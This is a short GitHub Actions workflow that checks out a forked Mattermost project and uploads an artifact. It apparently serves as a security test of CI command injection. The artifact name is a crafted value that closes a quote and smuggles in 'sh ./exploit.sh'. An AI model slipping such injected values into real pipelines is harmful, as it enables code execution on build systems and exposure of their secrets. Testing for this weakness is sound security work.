name: Artifact Test
on:
  workflow_dispatch:

jobs:
  security-test:
    runs-on: ubuntu-22.04
    steps:
      - name: Checkout forked mattermost project
        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
      - name: Persist build artifacts
        uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
        with:
          name: 'file)"; sh ./exploit.sh;  echo "x='
          path: .github/workflows/
          retention-days: 2
